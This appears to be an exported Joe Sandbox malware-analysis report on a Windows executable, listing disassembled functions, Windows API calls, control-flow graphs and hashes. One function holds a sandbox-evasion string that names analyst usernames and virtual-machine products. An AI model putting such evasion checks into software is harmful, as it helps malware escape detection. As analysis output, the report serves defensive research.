                                        • Instruction ID: bb32bc6c0798f1b1448335687645f208a07400568f21a9fc4eecc76bde7f20ed
                                        • Opcode Fuzzy Hash: 108ad1669d5f654cf7088fbd5db76f8917ec5f9a1101b15b5fb6b39ab74f4e40
                                        • Instruction Fuzzy Hash: 80518232E04B8187E7709F62F8847AAA675FB457A8F404235CE6D4BBD5DF3CA5418390
                                        Function 00007FF7F411F200 Relevance: 4.6, APIs: 3, Instructions: 83filenativesynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorFileObjectSingleStatusWaitWrite
                                        • String ID:
                                        • API String ID: 3447438843-0
                                        • Opcode ID: 83d7b160387bc71befc0e2236d4a3df64de8f29feef33d0b9e5494b388aa95c9
                                        • Instruction ID: 286f84e87720cba830db5a296cf0433f61b276aac42db5e56723b9badc641622
                                        • Opcode Fuzzy Hash: 83d7b160387bc71befc0e2236d4a3df64de8f29feef33d0b9e5494b388aa95c9
                                        • Instruction Fuzzy Hash: 8A318E32F08B518AE710DFB5F8907A977A4EB95358F944130EA5D43AD8EF38D1958390
                                        Function 00007FF7F411F0E0 Relevance: 4.6, APIs: 3, Instructions: 75filenativesynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorFileObjectReadSingleStatusWait
                                        • String ID:
                                        • API String ID: 3583596364-0
                                        • Opcode ID: 6b2b8c81433aba9b8012bb8a5dc3d03e10c04479521bde7f886105c347d82123
                                        • Instruction ID: 430f021e8a43cf0997036aa12a28efb1623d7e26d261e5509b79cf0453d3fd90
                                        • Opcode Fuzzy Hash: 6b2b8c81433aba9b8012bb8a5dc3d03e10c04479521bde7f886105c347d82123
                                        • Instruction Fuzzy Hash: 58319232F08B418AF710DF75F8807A967B4AB95368F944130EA5D83AD8EF3CD1958390
                                        Function 00007FF7F410CBF0 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2873 7ff7f410cbf0-7ff7f410cc01 2874 7ff7f410cc62 2873->2874 2875 7ff7f410cc03-7ff7f410cc1d 2873->2875 2877 7ff7f410cc64-7ff7f410cc74 2874->2877 2876 7ff7f410cc28-7ff7f410cc4a BCryptGenRandom 2875->2876 2878 7ff7f410cc4c-7ff7f410cc58 SystemFunction036 2876->2878 2879 7ff7f410cc20-7ff7f410cc26 2876->2879 2878->2879 2880 7ff7f410cc5a-7ff7f410cc60 2878->2880 2879->2874 2879->2876 2880->2877
                                        APIs
                                        • BCryptGenRandom.BCRYPT(?,?,?,00007FF7F410C955,?,?,?,00007FF7F413D87B), ref: 00007FF7F410CC42
                                        • SystemFunction036.ADVAPI32(?,?,?,00007FF7F410C955,?,?,?,00007FF7F413D87B), ref: 00007FF7F410CC53
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CryptFunction036RandomSystem
                                        • String ID:
                                        • API String ID: 1232939966-0
                                        • Opcode ID: 156b8d29b021a0b699b54c0dc488f79796eb3c5d946079082ee26368548ee791
                                        • Instruction ID: 8da536a62a7c132db008b4a0cd5472aa970daf8a484f79c4104bc9186de44476
                                        • Opcode Fuzzy Hash: 156b8d29b021a0b699b54c0dc488f79796eb3c5d946079082ee26368548ee791
                                        • Instruction Fuzzy Hash: 1CF0F422F0915542FB687E6BFF88530D5412F19BF0F784731AC3C877E0BD28A8824650
                                        Function 00007FF7F410DA70 Relevance: 1.6, APIs: 1, Instructions: 75timeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3099 7ff7f410da70-7ff7f410daac GetTimeZoneInformationForYear 3100 7ff7f410db4f 3099->3100 3101 7ff7f410dab2-7ff7f410dad9 3099->3101 3102 7ff7f410db55-7ff7f410db61 3100->3102 3101->3100 3103 7ff7f410dadb-7ff7f410dade 3101->3103 3103->3100 3104 7ff7f410dae0-7ff7f410daec 3103->3104 3104->3100 3105 7ff7f410daee-7ff7f410daf5 3104->3105 3105->3100 3106 7ff7f410daf7-7ff7f410dafb 3105->3106 3106->3100 3107 7ff7f410dafd-7ff7f410db09 3106->3107 3107->3100 3108 7ff7f410db0b-7ff7f410db22 call 7ff7f410dba0 3107->3108 3108->3100 3111 7ff7f410db24-7ff7f410db4d call 7ff7f410dba0 3108->3111 3111->3100 3114 7ff7f410db62-7ff7f410db94 3111->3114 3114->3102
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: InformationTimeYearZone
                                        • String ID:
                                        • API String ID: 2325421820-0
                                        • Opcode ID: 00a454c135f09f1f250e6a997138a96e1f69e719d8c17f8820de649a108718ef
                                        • Instruction ID: 5f76f75c55c104c827e04eba1628951b92472a6ea7af74740b8c542ef565fe85
                                        • Opcode Fuzzy Hash: 00a454c135f09f1f250e6a997138a96e1f69e719d8c17f8820de649a108718ef
                                        • Instruction Fuzzy Hash: 4B316032A086858BE764DF1AF0847AAF7A1EBC9350F504035DA9943B94EE3CE080CF44
                                        Function 00007FF7F4108B20 Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                        Download Yara Rule
                                        Strings
                                        • /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel, xrefs: 00007FF7F4108B4D, 00007FF7F4108E1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: /mtasklistsandboxusertestadminrootmalwareanalysisdefaultabbeyAdministratorAlBrunobrunoFredfredGeorgegeorgeharry johnsonLisaPaul JonesworkvtcdekkerUSERNAMEVBOXVMWAREQEMUXENHYPER-VPARALLELSKVMcomputersystemgetmodel
                                        • API String ID: 0-984818510
                                        • Opcode ID: d384c8ecaa7220cd52494481d8886919a28e692dbd5ca23d0021bcb48872dee7
                                        • Instruction ID: b421cb45188825b774880933d4cd3fa71d4abe5bda61688bc3acd30ca2afff93
                                        • Opcode Fuzzy Hash: d384c8ecaa7220cd52494481d8886919a28e692dbd5ca23d0021bcb48872dee7
                                        • Instruction Fuzzy Hash: F3919262F08B5186E710AF26E8843E8B7A0FB48B98F584635EE6D177C5DF39D185C390
                                        Function 00007FF7F411A610 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 203synchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1763 7ff7f411a610-7ff7f411a65c call 7ff7f41218f0 1766 7ff7f411a662-7ff7f411a691 1763->1766 1767 7ff7f411a885-7ff7f411a896 1763->1767 1769 7ff7f411a699-7ff7f411a6f4 1766->1769 1770 7ff7f411a693 CloseHandle 1766->1770 1768 7ff7f411a8c7-7ff7f411a8dd 1767->1768 1771 7ff7f411a756-7ff7f411a759 1769->1771 1772 7ff7f411a6f6-7ff7f411a6f9 1769->1772 1770->1769 1775 7ff7f411a75b-7ff7f411a775 call 7ff7f4120950 1771->1775 1776 7ff7f411a7c0-7ff7f411a7da WaitForSingleObject 1771->1776 1773 7ff7f411a78d-7ff7f411a7b1 call 7ff7f4120950 1772->1773 1774 7ff7f411a6ff-7ff7f411a719 call 7ff7f4120d20 1772->1774 1788 7ff7f411a7b7-7ff7f411a7ba CloseHandle 1773->1788 1789 7ff7f411a912-7ff7f411a93f call 7ff7f413f870 1773->1789 1774->1776 1791 7ff7f411a71f-7ff7f411a751 call 7ff7f413f870 1774->1791 1795 7ff7f411a77b-7ff7f411a78b CloseHandle 1775->1795 1796 7ff7f411a8de-7ff7f411a910 call 7ff7f413f870 1775->1796 1777 7ff7f411a7dc-7ff7f411a7eb GetLastError 1776->1777 1778 7ff7f411a821-7ff7f411a83d GetExitCodeProcess 1776->1778 1782 7ff7f411a7fc-7ff7f411a807 1777->1782 1783 7ff7f411a7ed-7ff7f411a7f7 call 7ff7f410a130 1777->1783 1778->1777 1785 7ff7f411a83f-7ff7f411a861 1778->1785 1792 7ff7f411a818-7ff7f411a81f 1782->1792 1793 7ff7f411a809-7ff7f411a813 call 7ff7f410a130 1782->1793 1783->1782 1794 7ff7f411a865-7ff7f411a880 CloseHandle * 2 1785->1794 1788->1776 1804 7ff7f411a944-7ff7f411a98a CloseHandle 1789->1804 1791->1804 1792->1794 1793->1792 1801 7ff7f411a898-7ff7f411a8c3 1794->1801 1802 7ff7f411a882 1794->1802 1795->1776 1796->1804 1801->1768 1802->1767
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
                                        • String ID: called `Result::unwrap()` on an `Err` value
                                        • API String ID: 17306042-2333694755
                                        • Opcode ID: 98050de64407eec83e84d274591eb1f76851ba59d11f64f5e6645ddd7a7c7f19
                                        • Instruction ID: 0b36e2142f5deccf37320a4283027a9c19ec5fe24f12497a338ef8ae1013df2f
                                        • Opcode Fuzzy Hash: 98050de64407eec83e84d274591eb1f76851ba59d11f64f5e6645ddd7a7c7f19
                                        • Instruction Fuzzy Hash: F4A14232E04B818AE7619F32E8803E97764FB45798F548226DE5D07B99DF38D185C390
                                        Function 00007FF7F4138BE4 Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                        • String ID:
                                        • API String ID: 1804101941-0
                                        • Opcode ID: eee810bb95535470bffe68d2ba9a8a383abc4ee3ff95bb7e2462f86346f6db18
                                        • Instruction ID: ffc44ff5e5b108b0f9c3d8ec53d98cdc20cc68b7357ef2ff9b42fa3cad2b7e4c
                                        • Opcode Fuzzy Hash: eee810bb95535470bffe68d2ba9a8a383abc4ee3ff95bb7e2462f86346f6db18
                                        • Instruction Fuzzy Hash: DE312C21E0C14283FB54BF27F4913B9A3919F45784FC44434E66D0B2D7DE2DA845A2B0
                                        Function 00007FF7F411E610 Relevance: 9.2, APIs: 6, Instructions: 184fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1857 7ff7f411e610-7ff7f411e64e call 7ff7f41284d0 1860 7ff7f411e65a-7ff7f411e68a call 7ff7f4129f80 1857->1860 1861 7ff7f411e650-7ff7f411e655 1857->1861 1865 7ff7f411e68c-7ff7f411e68f 1860->1865 1866 7ff7f411e694-7ff7f411e6a0 1860->1866 1862 7ff7f411e7ff-7ff7f411e80e 1861->1862 1865->1862 1867 7ff7f411e6ac-7ff7f411e6ae 1866->1867 1868 7ff7f411e6a2-7ff7f411e6a4 1866->1868 1869 7ff7f411e6b0-7ff7f411e6b8 1867->1869 1870 7ff7f411e6f5-7ff7f411e6f9 1867->1870 1868->1869 1871 7ff7f411e6a6-7ff7f411e6aa 1868->1871 1872 7ff7f411e6ba-7ff7f411e6bc 1869->1872 1873 7ff7f411e709-7ff7f411e70d 1869->1873 1874 7ff7f411e6fb-7ff7f411e6ff 1870->1874 1875 7ff7f411e6be-7ff7f411e6cb 1870->1875 1871->1873 1872->1873 1872->1875 1878 7ff7f411e70f-7ff7f411e711 1873->1878 1879 7ff7f411e742-7ff7f411e744 1873->1879 1874->1875 1877 7ff7f411e701-7ff7f411e705 1874->1877 1875->1862 1876 7ff7f411e6d1-7ff7f411e6f0 call 7ff7f410a130 1875->1876 1876->1862 1877->1875 1883 7ff7f411e707 1877->1883 1880 7ff7f411e74a-7ff7f411e753 1878->1880 1884 7ff7f411e713-7ff7f411e71c 1878->1884 1879->1880 1881 7ff7f411e83f-7ff7f411e84f 1879->1881 1885 7ff7f411e71e-7ff7f411e722 1880->1885 1886 7ff7f411e755 1880->1886 1881->1886 1887 7ff7f411e855 1881->1887 1883->1873 1884->1885 1884->1886 1890 7ff7f411e728-7ff7f411e740 1885->1890 1891 7ff7f411e82c-7ff7f411e82f 1885->1891 1889 7ff7f411e758-7ff7f411e799 CreateFileW 1886->1889 1896 7ff7f411e85a-7ff7f411e877 GetLastError CloseHandle 1887->1896 1894 7ff7f411e79b-7ff7f411e7a2 1889->1894 1895 7ff7f411e80f-7ff7f411e828 GetLastError 1889->1895 1890->1889 1892 7ff7f411e89a-7ff7f411e89c 1891->1892 1893 7ff7f411e831-7ff7f411e833 1891->1893 1892->1875 1897 7ff7f411e8a2-7ff7f411e8a7 1892->1897 1893->1897 1898 7ff7f411e835-7ff7f411e83a 1893->1898 1899 7ff7f411e7db-7ff7f411e7e0 1894->1899 1900 7ff7f411e7a4-7ff7f411e7a8 1894->1900 1903 7ff7f411e82a 1895->1903 1904 7ff7f411e7e2-7ff7f411e7f9 call 7ff7f410a130 1895->1904 1901 7ff7f411e879-7ff7f411e888 call 7ff7f410a130 1896->1901 1902 7ff7f411e88d-7ff7f411e895 1896->1902 1897->1889 1898->1889 1899->1904 1907 7ff7f411e7fc 1899->1907 1900->1899 1905 7ff7f411e7aa-7ff7f411e7b5 GetLastError 1900->1905 1901->1902 1902->1862 1903->1907 1904->1907 1905->1899 1909 7ff7f411e7b7-7ff7f411e7d9 SetFileInformationByHandle 1905->1909 1907->1862 1909->1896 1909->1899
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileHandle$CloseCreateInformation
                                        • String ID:
                                        • API String ID: 1617036312-0
                                        • Opcode ID: 0ddb327ce91df9d84e5046fd063802ff5ba92c5831474f6817db1fb96f3d3a89
                                        • Instruction ID: bfe2f9851084e3a91a0163865f862fbcf2e26db29545769ea01f98d65bddd126
                                        • Opcode Fuzzy Hash: 0ddb327ce91df9d84e5046fd063802ff5ba92c5831474f6817db1fb96f3d3a89
                                        • Instruction Fuzzy Hash: 6D71D361F0835247FB616FA3E48037AAAB4AF94BA4F944131CD6D07AC8DE3CD84583E0
                                        Function 00007FF7F4114CA0 Relevance: 9.1, APIs: 6, Instructions: 81timesleepsynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1911 7ff7f4114ca0-7ff7f4114cb7 1912 7ff7f4114cb9-7ff7f4114cbb 1911->1912 1913 7ff7f4114cc1-7ff7f4114cda CreateWaitableTimerExW 1911->1913 1912->1913 1914 7ff7f4114d5a-7ff7f4114d6a 1912->1914 1913->1914 1915 7ff7f4114cdc-7ff7f4114cea 1913->1915 1916 7ff7f4114d6c-7ff7f4114d7c 1914->1916 1917 7ff7f4114d9e Sleep 1914->1917 1918 7ff7f4114cec-7ff7f4114cfc 1915->1918 1919 7ff7f4114d51-7ff7f4114d54 CloseHandle 1915->1919 1916->1917 1920 7ff7f4114d7e-7ff7f4114d90 1916->1920 1921 7ff7f4114da4-7ff7f4114daf 1917->1921 1918->1919 1922 7ff7f4114cfe 1918->1922 1919->1914 1920->1917 1923 7ff7f4114d92-7ff7f4114d9a 1920->1923 1922->1919 1924 7ff7f4114d00-7ff7f4114d2d SetWaitableTimer 1922->1924 1923->1917 1924->1919 1925 7ff7f4114d2f-7ff7f4114d4d WaitForSingleObject CloseHandle 1924->1925 1925->1921 1926 7ff7f4114d4f 1925->1926 1926->1914
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                        • String ID:
                                        • API String ID: 2261246915-0
                                        • Opcode ID: abd99af6bd88042d1dd5512cba818c5c5812610d3b38a9f3d41f1412972b137f
                                        • Instruction ID: fd217d41f5750205198b39aee1828f66c63ec38d765124302f9a6aae5a4b899b
                                        • Opcode Fuzzy Hash: abd99af6bd88042d1dd5512cba818c5c5812610d3b38a9f3d41f1412972b137f
                                        • Instruction Fuzzy Hash: B821E422F0961217EF58AF37F964734862A9FD5BB0F848234DD3E46BE4DE3CA4814290
                                        Function 00007FF7F41146C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2162 7ff7f41146c0-7ff7f4114733 AddVectoredExceptionHandler SetThreadStackGuarantee GetCurrentThread SetThreadDescription call 7ff7f4114db0 call 7ff7f4114ab0 2172 7ff7f4114736 call 7ff7f4109078 2162->2172 2173 7ff7f4114736 call 7ff7f4108fb9 2162->2173 2174 7ff7f4114736 call 7ff7f4108ff9 2162->2174 2175 7ff7f4114736 call 7ff7f4109039 2162->2175 2176 7ff7f4114736 call 7ff7f4108fbd 2162->2176 2177 7ff7f4114736 call 7ff7f4108ffd 2162->2177 2178 7ff7f4114736 call 7ff7f410907f 2162->2178 2179 7ff7f4114736 call 7ff7f4108f80 2162->2179 2180 7ff7f4114736 call 7ff7f4109040 2162->2180 2181 7ff7f4114736 call 7ff7f4108fc1 2162->2181 2182 7ff7f4114736 call 7ff7f4109001 2162->2182 2183 7ff7f4114736 call 7ff7f4108fc5 2162->2183 2184 7ff7f4114736 call 7ff7f4109047 2162->2184 2185 7ff7f4114736 call 7ff7f4109008 2162->2185 2186 7ff7f4114736 call 7ff7f4108fc9 2162->2186 2187 7ff7f4114736 call 7ff7f4108fcd 2162->2187 2188 7ff7f4114736 call 7ff7f410904e 2162->2188 2189 7ff7f4114736 call 7ff7f410900f 2162->2189 2190 7ff7f4114736 call 7ff7f4108fd1 2162->2190 2191 7ff7f4114736 call 7ff7f4108fd5 2162->2191 2192 7ff7f4114736 call 7ff7f4109055 2162->2192 2193 7ff7f4114736 call 7ff7f4109016 2162->2193 2194 7ff7f4114736 call 7ff7f4108fd9 2162->2194 2195 7ff7f4114736 call 7ff7f4108f5a 2162->2195 2196 7ff7f4114736 call 7ff7f410905c 2162->2196 2197 7ff7f4114736 call 7ff7f4108fdd 2162->2197 2198 7ff7f4114736 call 7ff7f4108fa0 2162->2198 2199 7ff7f4114736 call 7ff7f4108fe1 2162->2199 2200 7ff7f4114736 call 7ff7f4109063 2162->2200 2201 7ff7f4114736 call 7ff7f4109024 2162->2201 2202 7ff7f4114736 call 7ff7f4108fe5 2162->2202 2203 7ff7f4114736 call 7ff7f4108fe9 2162->2203 2204 7ff7f4114736 call 7ff7f410906a 2162->2204 2205 7ff7f4114736 call 7ff7f410902b 2162->2205 2206 7ff7f4114736 call 7ff7f4108fed 2162->2206 2207 7ff7f4114736 call 7ff7f4108ef0 2162->2207 2208 7ff7f4114736 call 7ff7f4108ff1 2162->2208 2209 7ff7f4114736 call 7ff7f4109071 2162->2209 2210 7ff7f4114736 call 7ff7f4109032 2162->2210 2211 7ff7f4114736 call 7ff7f4108fb5 2162->2211 2212 7ff7f4114736 call 7ff7f4108ff5 2162->2212 2167 7ff7f4114739-7ff7f4114745 2169 7ff7f4114747-7ff7f4114757 call 7ff7f413e500 2167->2169 2170 7ff7f411475c-7ff7f4114769 2167->2170 2169->2170 2172->2167 2173->2167 2174->2167 2175->2167 2176->2167 2177->2167 2178->2167 2179->2167 2180->2167 2181->2167 2182->2167 2183->2167 2184->2167 2185->2167 2186->2167 2187->2167 2188->2167 2189->2167 2190->2167 2191->2167 2192->2167 2193->2167 2194->2167 2195->2167 2196->2167 2197->2167 2198->2167 2199->2167 2200->2167 2201->2167 2202->2167 2203->2167 2204->2167 2205->2167 2206->2167 2207->2167 2208->2167 2209->2167 2210->2167 2211->2167 2212->2167
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: Thread$CurrentDescriptionExceptionGuaranteeHandlerStackVectored
                                        • String ID: main
                                        • API String ID: 3663057573-3207122276
                                        • Opcode ID: aff96ae2daea4c37a3667f91690bbb9d7f047d6ef6fcb56457d51776b9872f87
                                        • Instruction ID: 1b5292bd5758bc6ab88904710b9bd5aea9211e1e9a9ec650129ca88173085c84
                                        • Opcode Fuzzy Hash: aff96ae2daea4c37a3667f91690bbb9d7f047d6ef6fcb56457d51776b9872f87
                                        • Instruction Fuzzy Hash: F5113D21F18B158AFB10EF66F8883EC6760AB457A4F804231CE6D566E4EF28A449C390
                                        Function 00007FF7F410CC80 Relevance: 3.1, APIs: 2, Instructions: 109COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423774744.00007FF7F415A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423798690.00007FF7F415B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff7f4100000_9KEZfGRjyK.jbxd
                                        Similarity
                                        • API ID: ComputerName$ErrorLast
                                        • String ID:
                                        • API String ID: 2051095488-0
                                        • Opcode ID: 444db1469ea464d383774e53951557fa80ec6c9f18d07cd741958a65af9121ed
                                        • Instruction ID: 936369286e207c9c103d356f524b9d3871304dee6150c61e7abc545c0f5ecbcb
                                        • Opcode Fuzzy Hash: 444db1469ea464d383774e53951557fa80ec6c9f18d07cd741958a65af9121ed
                                        • Instruction Fuzzy Hash: F541E562F04A018AF714AF6BE8853FCAB71BF44784FA48134DE6D166C5EF389581C7A0
                                        Function 00007FF7F4126A40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F41240C9), ref: 00007FF7F4126AC8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2423701109.00007FF7F4101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4100000, based on PE: true
                                        • Associated: 00000000.00000002.2423680582.00007FF7F4100000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2423734929.00007FF7F4140000.00000002.00000001.01000000.00000003.sdmpDownload File
